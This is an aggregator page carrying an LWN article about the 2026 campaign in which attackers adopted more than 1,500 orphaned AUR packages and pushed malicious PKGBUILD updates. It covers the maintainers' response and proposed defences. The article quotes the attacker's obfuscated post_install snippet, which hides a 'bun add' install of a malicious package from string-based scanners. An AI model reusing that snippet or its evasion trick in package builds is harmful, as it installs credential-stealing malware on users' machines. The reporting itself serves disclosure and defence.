惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Security Archives - TechRepublic
Security Archives - TechRepublic
Project Zero
Project Zero
K
Kaspersky official blog
G
Google Developers Blog
T
Threat Research - Cisco Blogs
T
The Blog of Author Tim Ferriss
Cyberwarzone
Cyberwarzone
Y
Y Combinator Blog
Recorded Future
Recorded Future
Blog — PlanetScale
Blog — PlanetScale
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Cisco Talos Blog
Cisco Talos Blog
Latest news
Latest news
Microsoft Security Blog
Microsoft Security Blog
H
Help Net Security
S
Schneier on Security
P
Palo Alto Networks Blog
H
Hacker News: Front Page
N
News and Events Feed by Topic
N
Netflix TechBlog - Medium
博客园 - Franky
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
SecWiki News
SecWiki News
Cloudbric
Cloudbric
TaoSecurity Blog
TaoSecurity Blog
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
The Hacker News
The Hacker News
C
Check Point Blog
L
LangChain Blog
腾讯CDC
小众软件
小众软件
T
Tenable Blog
Google DeepMind News
Google DeepMind News
GbyAI
GbyAI
L
LINUX DO - 最新话题
A
About on SuperTechFans
Google Online Security Blog
Google Online Security Blog
C
Cisco Blogs
Recent Announcements
Recent Announcements
Hacker News: Ask HN
Hacker News: Ask HN
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Vercel News
Vercel News
雷峰网
雷峰网
美团技术团队
D
DataBreaches.Net
Martin Fowler
Martin Fowler
Help Net Security
Help Net Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
F
Full Disclosure
博客园_首页

Hacker News

Introducing Claude Opus 4.7 Qwen Studio The Future of Everything is Lies, I Guess: Where Do We Go From Here? GitHub - SeanFDZ/macmind: Single-layer transformer in HyperTalk for the classic Macintosh Show HN: Agent-cache – Multi-tier LLM/tool/session caching for Valkey and Redis Moving a large-scale metrics pipeline from StatsD to OpenTelemetry / Prometheus GitHub - Nightmare-Eclipse/RedSun: The Red Sun vulnerability repository GitHub - SethPyle376/hiraeth: Local AWS emulator focused on fast integration testing, with SQS support, SQLite-backed state, and a debug-friendly web UI. GitHub - macOS26/Agent: Any AI, replaces Claude Code, Cursor, OpenClaw. Over 18 LLM providers (Claude, OpenAI, Gemini, Ollama, Zai, HF, Qwen) wired into a native Mac app that writes code, builds Xcode projects, bumps versions, manages git, automates Safari, use AppleScript, JS or Accessibility, extend Agent! w/ MCP Servers, run tasks from your iPhone via Messages. YouTube now lets you turn off Shorts I Made a Terminal Pager Burgers | マクドナルド公式 Commands — HackerNews CLI documentation ChatGPT for Excel PiCore - Raspberry Pi Port of Tiny Core Linux Live Nation illegally monopolized ticketing market, jury finds Google Broke Its Promise to Me. Now ICE Has My Data. Founding Engineer at Adaptional | Y Combinator CRISPR takes important step toward silencing Down syndrome’s extra chromosome GitHub - saffron-health/libretto: The AI toolkit for building reliable browser automations US v. Heppner (S.D.N.Y. 2026) no attorney-client privilege for AI chats [pdf] Unexpected €54k billing spike in 13 hours: Firebase browser key without API restrictions used for Gemini requests Retrofitting JIT Compilers into C Interpreters IPv6 – Google The Accursèd Alphabetical Clock Cybersecurity Looks Like Proof of Work Now Fragments: April 14 Cal.com Goes Closed Source: Why AI Security Is Forcing Our Decision | Cal.com - Scheduling Software for Online Bookings Laravel raised money and now injects ads directly into your agent When moving fast, talking is the first thing to break Too much Discussion of the XOR swap trick – Heather Cafe Introduction to Spherical Harmonics for Graphics Programmers The Grand Line Building a Z-Machine in the worst possible language High-Level Rust: Getting 80% of the Benefits with 20% of the Pain GitHub - duguyue100/midnight-captain: Inspired by Midnight Commander, tailored to my taste. How to build a `git diff` driver · Jamie Tanna | Software Engineer Center for Responsible, Decentralized Intelligence at Berkeley The Local Universe’s Expansion Rate Is Clearer Than Ever, but Still Doesn’t Add Up - A new synthesis of astronomical measurements confirms a persistent mismatch that could point to physics beyond current models The air throughout our homes is infused with microplastics. But there are things you can do to breathe less of them The disturbing white paper Red Hat is trying to erase from the internet – OSnews The Future of Everything is Lies, I Guess: Annoyances ‘Abhorrent’: the inside story of the Polymarket gamblers betting millions on war Productive procrastination — Max van IJsselmuiden maps, territory and LMs 447 Terabytes per Square Centimetre at Zero Retention Energy: Non-Volatile Memory at the Atomic Scale on Fluorographane Show HN: Pardonned.com – A searchable database of US Pardons 20 Years on AWS and Never Not My Job The Seasons are Wrong Artemis II crew splashes down near San Diego after historic moon mission We gave an AI a 3 year retail lease in SF and asked it to make a profit | Andon Labs How a dancer with ALS used brainwaves to perform live On filing the corners off my MacBooks Installing every* Firefox extension OpenClaw’s memory is unreliable, and you don’t know when it will break Steve Blank Nowhere Is Safe Chimpanzees in Uganda locked in vicious 'civil war', say researchers watgo - a WebAssembly Toolkit for Go linux/Documentation/process/coding-assistants.rst at master · torvalds/linux GitHub - callumlocke/json-formatter: Makes JSON easy to read. Founding Product Engineer at Bild AI | Y Combinator A compelling title that is cryptic enough to get you to take action on it GitHub - Keychron/Keychron-Keyboards-Hardware-Design: Industrial design files for Keychron keyboards and mice. 100+ models with CAD assets in STEP, DXF, DWG, and PDF. Source-available, with commercial use allowed for original compatible accessories within the license terms. [ANNOUNCE] WireGuardNT v0.11 and WireGuard for Windows v0.6 Released 1D-Chess Helium Is Hard to Replace Cooperative Vectors Introduction | Evolve Keeping a Postgres queue healthy — PlanetScale Our response to the Axios developer tool compromise Do Americans read print books, e-books or audiobooks more? The Zettelkasten Method in Obsidian: A Practical Setup Guide Artemis II Is Competency Porn and We Are Starving For It WeakC4 Flight Viz — Cockpit View A Mexican surveillance giant you’ve never heard of is now watching the U.S. border Surelock: Deadlock-Free Mutexes for Rust RISC-V 101 – what is it and what does it mean for Canonical? | Ubuntu The Problem That Built an Industry How Much Linear Memory Access Is Enough? | Solidean Investigating Split Locks on x86-64 Simplest hash functions Sybilproof reputation mechanisms (2005) [pdf] What is a property? How Complex is my Code? Static code analysis in Kotlin — tools overview Toffoli gates are all you need PGLite evangelism dcmake: a new CMake debugger UI Clojure on Fennel part one: Persistent Data Structures Fragments: April 2 Python Release Python install manager 26.1 The Life and Death of the Book Review - Liberties Introducing Database Traffic Control — PlanetScale Bitcoin miners are losing $19,000 on every BTC produced as difficulty drops 7.8% God sleeps in the minerals Building slogbox Apple Silicon and Virtual Machines: Beating the 2 VM Limit Who was “Not Even Wrong” first? Pokemon Evolution Vs Darwinian Evolution The APL Programming Language Source Code
AURpocalypse now: a look at the recent AUR attacks
By Joe BrockmeierJune 19, 2026 · 2026-06-20 · via Hacker News

Welcome to LWN.net

The following subscription-only content has been made available to you by an LWN subscriber. Thousands of subscribers depend on LWN for the best news from the Linux and free software communities. If you enjoy this article, please consider subscribing to LWN. Thank you for visiting LWN.net!

The Arch User Repository (AUR) has been subjected to a sustained attack recently. The attacker, or attackers, have spun up a series of new accounts then used them to adopt orphaned packages and push malicious updates that would install malware on users' systems. It is unclear how many users were compromised in the attack, but the maintainers were playing Whac-A-Mole for several days to respond to each newly compromised package. The project has turned off the AUR's new-user registration, for now, but it is unclear what its long-term response will be or if the AUR can be secured without major changes to its existing collaboration model.

Why AUR is especially vulnerable

Arch Linux offers official repositories of software, such as core and extras, that are overseen by the Arch Linux Developers and Package Maintainers (see the official contributors categories for more on the hierarchy). These packages are vetted by maintainers and available for download in binary format using the pacman package manager.

The AUR, on the other hand, is a repository for software that has not yet made its way into the official repositories and may never do so. Pacman does not use the AUR repository directly, so users typically turn to a separate AUR helper application, such as paru or yay, for searching the AUR for software, downloading the PKGBUILD files, resolving dependencies, as well as compiling, installing, and updating software.

The AUR is maintained by Arch's Package Maintainers—they respond to requests to orphan or delete packages, and may move packages from AUR to the official extras repository, for example—but there is no formal review process for a package to enter the AUR, nor for any updates to it. The AUR contains the user-contributed PKGBUILD files that are needed to compile software from source; there are no binary builds provided. Currently there are more than 107,000 packages in the AUR, including nearly 14,000 that are currently orphaned and up for grabs.

AUR user registration is typically wide open to anyone who wishes to sign up—currently there are more than 141,000 registered users. Any person who has a registered user account on the AUR can adopt and make changes to orphaned packages. There is no review process or vetting that takes place when a user seeks to publish a new package or adopt an orphaned one; a registered user only has to click "Adopt Package" on the orphaned package's page and ownership of the package is automatically granted.

Use at your own risk

Arch users are expected to exercise care when working with packages from the AUR; they are warned that AUR PKGBUILD files are "completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk". In theory, users will review PKGBUILD files before building or installing the software; it's unlikely that this happens in practice, particularly when a user has already installed a package and is performing an update.

While Arch Linux does not provide builds for packages in the AUR, it does allow "-bin" PKGBUILD files, which are used to download prebuilt binaries from other locations. For example, users can install the LibreWolf fork of Firefox using the librewolf-bin package from the AUR rather than having to build it from source. This is not just convenient for open-source software with long build times; the AUR policies allow proprietary software as well, which is unlikely to be distributed in source form. Of course, this means that users have to be willing to trust that the AUR package maintainer is not providing anything malicious in the binaries.

Arch is not the only distribution that has a service for providing "use at your own risk", unreviewed, user-submitted content; Fedora has Copr, the openSUSE project has the Open Build Service (OBS), and Ubuntu has Personal Package Archives (PPAs). Each of those services allow a person to sign up without any review process and build packages for download by other users of the distributions.

However, there are important differences between those services and the AUR. They provide a build environment that is similar to the ones used for the official distribution packages, and do not allow pre-built binaries or proprietary software. The model for Copr, OBS, and PPAs is that a user creates a project under their own user namespace; users have to add each repository from one of those services separately.

For example, niri creator Ivan Molodetskikh maintains a Copr repository for Fedora users who want to run the tiling Wayland compositor. To install niri from Copr, a user has to enable that repository specifically. It is possible for other Copr users to create a similar project under their own namespace, but it is not possible for another user to take over Molodetskikh's repository unless they compromise his credentials. A would-be attacker could create a malicious fork on Copr and try to lure Fedora users to add that package repository to their system instead, but the attacker cannot simply pick up an orphaned Copr repository to compromise users who have already added it.

The AUR, on the other hand, is much more relaxed about ownership; the PKGBUILD files are all maintained under the AUR namespace. The rules state that, when a new maintainer takes over an AUR package, they are supposed to add their own information as maintainer and then list the prior maintainers as contributors. That, however, is taken on trust and (as seen with the current attack) can be easily abused.

Attacks

The AUR has been subject to a number of attacks over the years that took advantage of orphaned packages. In 2018, three packages were changed to include data-harvesting malware. There were two attacks last year; on July 18 Quentin Michaud sent out an advisory that three packages, all "-bin" packages for web browsers, were uploaded with remote-access trojan (RAT) malware. In late July, there was another attempt, quickly detected; a "google-chrome-stable" package was uploaded with another RAT.

Each of those attacks were small in scale. Not so the most recent attack, which seems to have started (and was detected on) May 27; Fabio Loli reported that the "plex-media-player" package had been updated to install a malicious npm package "crypto-javascript". The PKGBUILD had been orphaned and then adopted by a brand-new account. Several new packages with similar names had also been uploaded by new accounts, all with the same attempt to lure users into installing the malicious npm package.

On June 11, Mark Wagie reported that a new maintainer had adopted the "gnome-randr-rust" package and changed the PKGBUILD file to add a dependency on npm and then use it to install a malicious package called "atomic-lockfile". The attacker also changed the Contributor stanzas in the PKGBUILD to replace the email addresses of prior maintainers—but not the names. The Sonatype blog has an analysis of the package; it included an eBPF program that would attempt to exfiltrate a wide range of information from a user's machine including GitHub credentials, SSH information, browser cookies, data stores from chat applications like Slack, Discord, and more.

The attacker(s) went after hundreds of orphaned packages instead of a select few as with the attacks last year. Jonathan Grotelüschen, one of Arch's Package Maintainers, started a thread on June 11 for people to report compromised packages.

I contacted Grotelüschen by email to ask about the attack; he said that the attacker was creating accounts that would adopt a few packages and compromise them in a similar fashion. New user registration was stopped on June 11 and then re-enabled after the project added Anubis to try to foil the attacker's mass account registrations. That did not work, so registration was disabled again on June 12.

There was another wave of attacks on June 13, conducted with four accounts that had been created before registration was shut down. The attacker switched to using the Bun package manager to attempt to install malicious packages instead of npm, and then attempted to obfuscate the "bun install" command to evade scripts created to scan PKGBUILD files for strings with "npm" or "bun":

    # post_install() {
    #   $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' 
    $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 
    'n'"e"'x'"t""f"'i''l''e''-''j''s'
    # }

While the obfuscation attempt would evade scripts looking for an install command, any users who actually review the PKGBUILD file would hopefully find it suspect.

Response

In total, more than 1,500 packages are known to have been affected. Grotelüschen said that only about 20 new packages were created, the rest were orphaned packages adopted by the attacker. As of this writing, registration is still disabled. Grotelüschen said that the maintainers "keep the AUR as clean as we can, but at the scale of the AUR, our chance at catching absolutely everything is very small".

He added that "the attack exclusively affected the user-managed content, and the official repositories were unaffected". Furthermore, the AUR packages come with the disclaimer that they are "use at your own risk". Users are responsible for reading PKGBUILDs to decide for themselves if the content is safe to use, Grotelüschen said.

That policy, however, seems to be at odds with the practices of real-world users. It is likely that many users treat the AUR as just another package repository, and rarely if ever read a PKGBUILD file before installing or updating a package. Even careful, security-minded people are unlikely to review every single update to a PKGBUILD, and attackers only need to get lucky once. The AUR's policies may not be sufficient for today's security threats.

The project is working on making it harder to create new accounts, he said, but "the AUR will not require real names or even government id verification". He noted that there are discussions on the AUR mailing list about ways to prevent or detect similar attacks, but the ideas are coming from users rather than Arch maintainers and developers.

Because it's 2026, several ideas of course center around using LLMs, such as Thomas Stromberg's suggestion to use a project he's working on called Atomdrift, which uses "tiny local deterministic AI models, retrained constantly based on recent attacks and threat feeds". Andreas Reichel said he had built something similar called aurscan, which can use Claude, Codex, or local LLMs.

Lukas Grumlik thought that a change in how orphaned packages are handled might help. Instead of allowing anyone to adopt an orphaned package, he proposed that such packages be locked and set to a read-only state. Users could still download the PKGBUILD, but adoption would require "a proper request to take it over, explaining why it needs updating", which would hinder bots from mass takeovers. Reichel replied that such a strategy would discourage well-intentioned people who want to fix packages in good faith, but fail to stop "a state sanctioned criminal syndicate with at least 20k USD deep pockets" and access to LLMs "because my LLM Agent has all the time it needs and will write better explanations anyway".

Another approach would be to build defenses into the AUR utilities rather than the AUR itself. Fidel Ramos suggested that paru display "a loud warning" when installing or upgrading a package that had been orphaned and then adopted. That would likely require changes to the RPC interface for the AUR in order to expose the information needed. Josephine Pfeiffer has opened a merge request that would provide that information.

Jo Guerreiro, maintainer of yay, said that there had been many feature requests asking for changes along the lines of scanning for "npm install yyy", delayed time updates, or maintainer-change tracking. However, he argued that the next wave of malware would change tactics, "with all detection scanning fed into its generation cycle as 'iterate until it is not detected'". There was no way for yay to keep up with attackers, and he wanted to avoid "security theater".

However, he did note that the latest release of yay would now display the last modification time of a PKGBUILD. Recent modifications do not mean that users should not trust a package, but that they should be more careful and review the package. Older packages are not necessarily more trustworthy, he said, "but it is a reason to be more confident that it has been reviewed by the community".

Be careful out there

Considering the open-door policy for submissions and changes in the AUR, it's almost surprising that it has taken this long for an attacker to conduct a campaign at this scale. Nothing good lasts forever, though, and even if the person or persons behind this attack decides to move on, there will almost certainly be copycats.

Slowing new signups may help to some degree, but malicious actors will keep looking for ways to take advantage of AUR users who let their guard down in reviewing their PKGBUILD files. The AUR is an impressive example of community collaboration; it is unfortunate that there is always someone looking to abuse any system built on trust.